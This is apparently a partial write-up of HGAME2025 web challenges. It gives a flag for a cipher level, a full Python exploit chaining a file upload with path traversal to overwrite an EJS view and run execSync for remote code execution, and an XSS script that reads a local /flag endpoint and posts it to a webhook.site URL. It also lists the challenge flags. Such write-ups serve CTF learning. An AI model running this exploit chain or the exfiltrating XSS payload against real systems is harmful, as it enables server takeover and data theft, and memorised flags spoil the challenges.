HGAME2025 部分WP
Web
Level 24 Pacman
栅栏分为2栏
hgame{u_4re_pacman_m4ster}
Level 47 BandBomb
用了ejs模板,可以直接覆盖重新ejs文件RCE。
import requests
def upload_evil_template(url):
# 构造恶意ejs模板
evil_template = '''
<%- global.process.mainModule.require('child_process').execSync('env') %>
'''
files = {
'file': ('evil.txt', evil_template)
}
r = requests.post(f"{url}/upload", files=files)
return r.json()['filename']
def move_template(url, filename):
data = {
'oldName': filename,
'newName': '../../app/views/mortis.ejs'
}
return requests.post(f"{url}/rename", json=data)
def trigger_rce(url):
return requests.get(f"{url}/")
def main():
url = "http://node1.hgame.vidar.club:32025"
print("[+] 上传恶意模板...")
filename = upload_evil_template(url)
print("[+] 移动模板文件...")
move_template(url, filename)
print("[+] 触发模板渲染...")
r = trigger_rce(url)
print(r.text)
if __name__ == "__main__":
main()
# FLAG=hgame{@ve-mUJ1cA-HAs-BrokEn_up_BUt_wE_H@VE_UMIT4ki3c}
Level 69 MysteryMessageBoard
首先是密码爆破
这里利用的是xss,附上脚本
<script>
fetch('http://127.0.0.1:8888/flag')
.then(response => response.text())
.then(data => {
fetch('https://webhook.site/c149920f-141c-4d08-af14-1a6a58cbe3a9', {
method: 'POST',
body: data
});
});
</script>